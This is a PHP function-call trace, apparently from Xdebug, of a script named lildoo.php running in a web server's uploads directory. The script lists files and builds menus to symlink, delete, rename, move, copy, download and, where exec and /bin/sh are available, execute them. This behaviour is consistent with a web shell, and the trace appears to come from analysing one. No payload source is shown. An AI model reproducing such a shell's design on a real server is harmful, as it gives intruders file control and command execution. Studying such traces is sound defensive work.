4	381	0	0.022250	802704	sizeof	0		/var/www/html/uploads/lildoo.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 5 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
4	381	1	0.022327	802736
4	381	R			6
3		A						/var/www/html/uploads/lildoo.php	1250	$file = ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	382	0	0.022369	802704	date	0		/var/www/html/uploads/lildoo.php	1252	2	'n/j/y H:i:s'	1676257694
4	382	1	0.022407	803032
4	382	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1252	$timestamps = 'mtime: 2/12/23 22:08:14, '
4	383	0	0.022434	802648	date	0		/var/www/html/uploads/lildoo.php	1253	2	'n/j/y H:i:s'	1676257694
4	383	1	0.022464	802976
4	383	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1253	$timestamps .= 'atime: 2/12/23 22:08:14, '
4	384	0	0.022490	802672	date	0		/var/www/html/uploads/lildoo.php	1254	2	'n/j/y H:i:s'	1676257694
4	384	1	0.022520	803000
4	384	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1254	$timestamps .= 'ctime: 2/12/23 22:08:14'
4	385	0	0.022546	802896	html	1		/var/www/html/uploads/lildoo.php	1258	1	'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
5	386	0	0.022561	802896	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'	2	NULL
5	386	1	0.022578	803200
5	386	R			'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
4	385	1	0.022594	803088
4	385	R			'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
4	387	0	0.022611	802704	substr	0		/var/www/html/uploads/lildoo.php	1289	3	'lildoo.php'	0	1
4	387	1	0.022626	802800
4	387	R			'l'
4	388	0	0.022640	802784	urlencode	0		/var/www/html/uploads/lildoo.php	1296	1	'/var/www/html/uploads/lildoo.php'
4	388	1	0.022653	802896
4	388	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2Flildoo.php'
4	389	0	0.022670	802816	html	1		/var/www/html/uploads/lildoo.php	1296	1	'lildoo.php'
5	390	0	0.022682	802816	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'lildoo.php'	2	NULL
5	390	1	0.022696	803088
5	390	R			'lildoo.php'
4	389	1	0.022709	802976
4	389	R			'lildoo.php'
4	391	0	0.022723	802704	human_filesize	1		/var/www/html/uploads/lildoo.php	1304	1	77659
4		A						/var/www/html/uploads/lildoo.php	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/lildoo.php	1155	$n = 0
4		A						/var/www/html/uploads/lildoo.php	1157	$filesize /= 1024
4		A						/var/www/html/uploads/lildoo.php	1158	$n++
5	392	0	0.022780	802704	strpos	0		/var/www/html/uploads/lildoo.php	1161	2	75.8388671875	'.'
5	392	1	0.022796	803032
5	392	R			2
5	393	0	0.022809	802704	round	0		/var/www/html/uploads/lildoo.php	1161	2	75.8388671875	1
5	393	1	0.022824	802776
5	393	R			75.8
4		A						/var/www/html/uploads/lildoo.php	1161	$filesize = 75.8
5	394	0	0.022848	802704	strpos	0		/var/www/html/uploads/lildoo.php	1163	2	75.8	'.'
5	394	1	0.022862	803032
5	394	R			2
5	395	0	0.022876	802704	substr	0		/var/www/html/uploads/lildoo.php	1164	3	75.8	-1	1
5	395	1	0.022890	803056
5	395	R			'8'
5	396	0	0.022903	802704	in_array	0		/var/www/html/uploads/lildoo.php	1164	2	'8'	[0 => '0', 1 => '.']
5	396	1	0.022922	802776
5	396	R			FALSE
5	397	0	0.022945	802704	substr	0		/var/www/html/uploads/lildoo.php	1169	3	'kMGTPE'	0	1
5	397	1	0.022960	802800
5	397	R			'k'
4		A						/var/www/html/uploads/lildoo.php	1169	$suffix = 'k'
4	391	1	0.022985	802736
4	391	R			'75.8 kB'
3		A						/var/www/html/uploads/lildoo.php	1304	$human = ' title="75.8 kB"'
4	398	0	0.023012	802752	decoct	0		/var/www/html/uploads/lildoo.php	1315	1	33204
4	398	1	0.023024	802824
4	398	R			'100664'
4	399	0	0.023038	802752	function_exists	0		/var/www/html/uploads/lildoo.php	1317	1	'posix_getuid'
4	399	1	0.023051	802792
4	399	R			TRUE
4	400	0	0.023064	802752	posix_getuid	0		/var/www/html/uploads/lildoo.php	1317	0
4	400	1	0.023077	802752
4	400	R			33
3		A						/var/www/html/uploads/lildoo.php	1317	$l = FALSE
4	401	0	0.023100	802752	permission_octal2string	1		/var/www/html/uploads/lildoo.php	1319	1	33204
4		A						/var/www/html/uploads/lildoo.php	966	$type = '-'
4		A						/var/www/html/uploads/lildoo.php	979	$owner = 'r'
4		A						/var/www/html/uploads/lildoo.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/lildoo.php	984	$owner .= '-'
4		A						/var/www/html/uploads/lildoo.php	987	$group = 'r'
4		A						/var/www/html/uploads/lildoo.php	988	$group .= 'w'
4		A						/var/www/html/uploads/lildoo.php	992	$group .= '-'
4		A						/var/www/html/uploads/lildoo.php	995	$other = 'r'
4		A						/var/www/html/uploads/lildoo.php	996	$other .= '-'
4		A						/var/www/html/uploads/lildoo.php	1000	$other .= '-'
4	401	1	0.023212	802792
4	401	R			'-rw-rw-r--'
4	402	0	0.023225	802792	html	1		/var/www/html/uploads/lildoo.php	1319	1	'-rw-rw-r--'
5	403	0	0.023238	802792	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'-rw-rw-r--'	2	NULL
5	403	1	0.023253	803064
5	403	R			'-rw-rw-r--'
4	402	1	0.023267	802952
4	402	R			'-rw-rw-r--'
4	404	0	0.023281	802752	array_key_exists	0		/var/www/html/uploads/lildoo.php	1324	2	'owner_name'	['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	404	1	0.023312	802816
4	404	R			TRUE
4	405	0	0.023325	802752	array_key_exists	0		/var/www/html/uploads/lildoo.php	1330	2	'group_name'	['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	405	1	0.023353	802816
4	405	R			TRUE
4	406	0	0.023367	802848	html	1		/var/www/html/uploads/lildoo.php	1339	1	'/var/www/html/uploads/lildoo.php'
5	407	0	0.023380	802848	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'/var/www/html/uploads/lildoo.php'	2	NULL
5	407	1	0.023395	803120
5	407	R			'/var/www/html/uploads/lildoo.php'
4	406	1	0.023411	803008
4	406	R			'/var/www/html/uploads/lildoo.php'
3		A						/var/www/html/uploads/lildoo.php	1342	$actions = []
4	408	0	0.023437	802376	function_exists	0		/var/www/html/uploads/lildoo.php	1343	1	'symlink'
4	408	1	0.023450	802416
4	408	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	1344	$actions[] = 'create_symlink'
4	409	0	0.023475	802752	dirname	0		/var/www/html/uploads/lildoo.php	1346	1	'/var/www/html/uploads/lildoo.php'
4	409	1	0.023488	802848
4	409	R			'/var/www/html/uploads'
4	410	0	0.023502	802816	is_writable	0		/var/www/html/uploads/lildoo.php	1346	1	'/var/www/html/uploads'
4	410	1	0.023524	802856
4	410	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/lildoo.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/lildoo.php	1349	$actions[] = 'move'
3		A						/var/www/html/uploads/lildoo.php	1352	$actions[] = 'copy'
3		A						/var/www/html/uploads/lildoo.php	1353	$actions[] = 'download'
4	411	0	0.023588	802752	function_exists	0		/var/www/html/uploads/lildoo.php	1356	1	'exec'
4	411	1	0.023601	802792
4	411	R			TRUE
4	412	0	0.023614	802752	sizeof	0		/var/www/html/uploads/lildoo.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move', 4 => 'copy', 5 => 'download']
4	412	1	0.023637	802784
4	412	R			6
4	413	0	0.023651	802848	str_repeat	0		/var/www/html/uploads/lildoo.php	1363	2	'&nbsp;'	30
4	413	1	0.023665	803136
4	413	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	414	0	0.023681	802816	word	1		/var/www/html/uploads/lildoo.php	1367	1	'create_symlink'
5	415	0	0.023694	802816	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'create symlink'	2	'UTF-8'
5	415	1	0.023709	803088
5	415	R			'create symlink'
4	414	1	0.023724	802976
4	414	R			'create symlink'
4	416	0	0.023739	802808	word	1		/var/www/html/uploads/lildoo.php	1367	1	'delete'
5	417	0	0.023752	802808	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'delete'	2	'UTF-8'
5	417	1	0.023766	803080
5	417	R			'delete'
4	416	1	0.023780	802968
4	416	R			'delete'
4	418	0	0.023793	802808	word	1		/var/www/html/uploads/lildoo.php	1367	1	'rename'
5	419	0	0.023806	802808	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'rename'	2	'UTF-8'
5	419	1	0.023820	803080
5	419	R			'rename'
4	418	1	0.023834	802968
4	418	R			'rename'
4	420	0	0.023848	802800	word	1		/var/www/html/uploads/lildoo.php	1367	1	'move'
5	421	0	0.023860	802800	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'move'	2	'UTF-8'
5	421	1	0.023874	803072
5	421	R			'move'
4	420	1	0.023888	802960
4	420	R			'move'
4	422	0	0.023901	802800	word	1		/var/www/html/uploads/lildoo.php	1367	1	'copy'
5	423	0	0.023914	802800	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'copy'	2	'UTF-8'
5	423	1	0.023928	803072
5	423	R			'copy'
4	422	1	0.023941	802960
4	422	R			'copy'
4	424	0	0.023954	802808	word	1		/var/www/html/uploads/lildoo.php	1367	1	'download'
5	425	0	0.023967	802808	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'download'	2	'UTF-8'
5	425	1	0.023981	803080
5	425	R			'download'
4	424	1	0.023995	802968
4	424	R			'download'
3		A						/var/www/html/uploads/lildoo.php	1249	$i++
4	426	0	0.024019	802752	sizeof	0		/var/www/html/uploads/lildoo.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 5 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
4	426	1	0.024091	802784
4	426	R			6
3		A						/var/www/html/uploads/lildoo.php	1250	$file = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	427	0	0.024132	802752	date	0		/var/www/html/uploads/lildoo.php	1252	2	'n/j/y H:i:s'	1676257694
4	427	1	0.024164	803080
4	427	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1252	$timestamps = 'mtime: 2/12/23 22:08:14, '
4	428	0	0.024191	802696	date	0		/var/www/html/uploads/lildoo.php	1253	2	'n/j/y H:i:s'	1676257694
4	428	1	0.024222	803024
4	428	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1253	$timestamps .= 'atime: 2/12/23 22:08:14, '
4	429	0	0.024248	802720	date	0		/var/www/html/uploads/lildoo.php	1254	2	'n/j/y H:i:s'	1676257694
4	429	1	0.024278	803048
4	429	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1254	$timestamps .= 'ctime: 2/12/23 22:08:14'
4	430	0	0.024304	802944	html	1		/var/www/html/uploads/lildoo.php	1258	1	'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
5	431	0	0.024318	802944	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'	2	NULL
5	431	1	0.024335	803248
5	431	R			'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
4	430	1	0.024351	803136
4	430	R			'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
4	432	0	0.024367	802752	substr	0		/var/www/html/uploads/lildoo.php	1289	3	'prepend.php'	0	1
4	432	1	0.024381	802848
4	432	R			'p'
4	433	0	0.024395	802832	urlencode	0		/var/www/html/uploads/lildoo.php	1296	1	'/var/www/html/uploads/prepend.php'
4	433	1	0.024411	802944
4	433	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fprepend.php'
4	434	0	0.024428	802864	html	1		/var/www/html/uploads/lildoo.php	1296	1	'prepend.php'
5	435	0	0.024440	802864	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'prepend.php'	2	NULL
5	435	1	0.024454	803136
5	435	R			'prepend.php'
4	434	1	0.024469	803024
4	434	R			'prepend.php'
3		A						/var/www/html/uploads/lildoo.php	1306	$human = ''
4	436	0	0.024494	802704	decoct	0		/var/www/html/uploads/lildoo.php	1315	1	33261
4	436	1	0.024507	802776
4	436	R			'100755'
4	437	0	0.024520	802704	function_exists	0		/var/www/html/uploads/lildoo.php	1317	1	'posix_getuid'
4	437	1	0.024533	802744
4	437	R			TRUE
4	438	0	0.024546	802704	posix_getuid	0		/var/www/html/uploads/lildoo.php	1317	0
4	438	1	0.024558	802704
4	438	R			33
3		A						/var/www/html/uploads/lildoo.php	1317	$l = FALSE
4	439	0	0.024581	802704	permission_octal2string	1		/var/www/html/uploads/lildoo.php	1319	1	33261
4		A						/var/www/html/uploads/lildoo.php	966	$type = '-'
4		A						/var/www/html/uploads/lildoo.php	979	$owner = 'r'
4		A						/var/www/html/uploads/lildoo.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/lildoo.php	984	$owner .= 'x'
4		A						/var/www/html/uploads/lildoo.php	987	$group = 'r'
4		A						/var/www/html/uploads/lildoo.php	988	$group .= '-'
4		A						/var/www/html/uploads/lildoo.php	992	$group .= 'x'
4		A						/var/www/html/uploads/lildoo.php	995	$other = 'r'
4		A						/var/www/html/uploads/lildoo.php	996	$other .= '-'
4		A						/var/www/html/uploads/lildoo.php	1000	$other .= 'x'
4	439	1	0.024692	802744
4	439	R			'-rwxr-xr-x'
4	440	0	0.024706	802744	html	1		/var/www/html/uploads/lildoo.php	1319	1	'-rwxr-xr-x'
5	441	0	0.024719	802744	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'-rwxr-xr-x'	2	NULL
5	441	1	0.024734	803016
5	441	R			'-rwxr-xr-x'
4	440	1	0.024747	802904
4	440	R			'-rwxr-xr-x'
4	442	0	0.024761	802704	array_key_exists	0		/var/www/html/uploads/lildoo.php	1324	2	'owner_name'	['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	442	1	0.024791	802768
4	442	R			TRUE
4	443	0	0.024805	802704	array_key_exists	0		/var/www/html/uploads/lildoo.php	1330	2	'group_name'	['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	443	1	0.024833	802768
4	443	R			TRUE
4	444	0	0.024846	802800	html	1		/var/www/html/uploads/lildoo.php	1339	1	'/var/www/html/uploads/prepend.php'
5	445	0	0.024859	802800	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'/var/www/html/uploads/prepend.php'	2	NULL
5	445	1	0.024874	803072
5	445	R			'/var/www/html/uploads/prepend.php'
4	444	1	0.024889	802960
4	444	R			'/var/www/html/uploads/prepend.php'
3		A						/var/www/html/uploads/lildoo.php	1342	$actions = []
4	446	0	0.024915	802328	function_exists	0		/var/www/html/uploads/lildoo.php	1343	1	'symlink'
4	446	1	0.024928	802368
4	446	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	1344	$actions[] = 'create_symlink'
4	447	0	0.024952	802704	dirname	0		/var/www/html/uploads/lildoo.php	1346	1	'/var/www/html/uploads/prepend.php'
4	447	1	0.024965	802800
4	447	R			'/var/www/html/uploads'
4	448	0	0.024979	802768	is_writable	0		/var/www/html/uploads/lildoo.php	1346	1	'/var/www/html/uploads'
4	448	1	0.024995	802808
4	448	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/lildoo.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/lildoo.php	1349	$actions[] = 'move'
3		A						/var/www/html/uploads/lildoo.php	1352	$actions[] = 'copy'
3		A						/var/www/html/uploads/lildoo.php	1353	$actions[] = 'download'
4	449	0	0.025058	802704	function_exists	0		/var/www/html/uploads/lildoo.php	1356	1	'exec'
4	449	1	0.025071	802744
4	449	R			TRUE
4	450	0	0.025084	802704	file_exists	0		/var/www/html/uploads/lildoo.php	1356	1	'/bin/sh'
4	450	1	0.025107	802744
4	450	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	1357	$actions[] = 'execute'
4	451	0	0.025130	802704	sizeof	0		/var/www/html/uploads/lildoo.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move', 4 => 'copy', 5 => 'download', 6 => 'execute']
4	451	1	0.025149	802736
4	451	R			7
4	452	0	0.025163	802800	str_repeat	0		/var/www/html/uploads/lildoo.php	1363	2	'&nbsp;'	30
4	452	1	0.025176	803088
4	452	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	453	0	0.025192	802768	word	1		/var/www/html/uploads/lildoo.php	1367	1	'create_symlink'
5	454	0	0.025205	802768	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'create symlink'	2	'UTF-8'
5	454	1	0.025220	803040
5	454	R			'create symlink'
4	453	1	0.025235	802928
4	453	R			'create symlink'
4	455	0	0.025250	802760	word	1		/var/www/html/uploads/lildoo.php	1367	1	'delete'
5	456	0	0.025262	802760	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'delete'	2	'UTF-8'
5	456	1	0.025276	803032
5	456	R			'delete'
4	455	1	0.025290	802920
4	455	R			'delete'
4	457	0	0.025303	802760	word	1		/var/www/html/uploads/lildoo.php	1367	1	'rename'
5	458	0	0.025315	802760	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'rename'	2	'UTF-8'
5	458	1	0.025329	803032
5	458	R			'rename'
4	457	1	0.025343	802920
4	457	R			'rename'
4	459	0	0.025356	802752	word	1		/var/www/html/uploads/lildoo.php	1367	1	'move'
5	460	0	0.025369	802752	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'move'	2	'UTF-8'
5	460	1	0.025383	803024
5	460	R			'move'
4	459	1	0.025396	802912
4	459	R			'move'
4	461	0	0.025409	802752	word	1		/var/www/html/uploads/lildoo.php	1367	1	'copy'
5	462	0	0.025422	802752	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'copy'	2	'UTF-8'
5	462	1	0.025436	803024
5	462	R			'copy'
4	461	1	0.025449	802912
4	461	R			'copy'
4	463	0	0.025462	802760	word	1		/var/www/html/uploads/lildoo.php	1367	1	'download'
5	464	0	0.025474	802760	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'download'	2	'UTF-8'
5	464	1	0.025488	803032
5	464	R			'download'
4	463	1	0.025502	802920
4	463	R			'download'
4	465	0	0.025515	802760	word	1		/var/www/html/uploads/lildoo.php	1367	1	'execute'
5	466	0	0.025528	802760	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'execute'	2	'UTF-8'
5	466	1	0.025542	803032
5	466	R			'execute'
4	465	1	0.025556	802920
4	465	R			'execute'
3		A						/var/www/html/uploads/lildoo.php	1249	$i++
4	467	0	0.025588	802704	sizeof	0		/var/www/html/uploads/lildoo.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 5 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
4	467	1	0.025676	802736
